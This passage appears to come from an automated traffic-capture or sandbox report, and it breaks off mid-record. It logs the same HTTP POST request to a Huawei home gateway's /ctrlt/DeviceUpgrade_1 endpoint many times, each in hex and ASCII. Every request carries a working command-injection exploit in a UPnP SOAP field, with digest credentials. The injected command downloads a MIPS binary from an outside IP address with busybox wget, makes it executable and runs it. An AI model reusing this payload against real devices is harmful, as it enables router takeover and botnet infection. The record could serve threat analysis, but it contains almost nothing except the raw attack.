6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 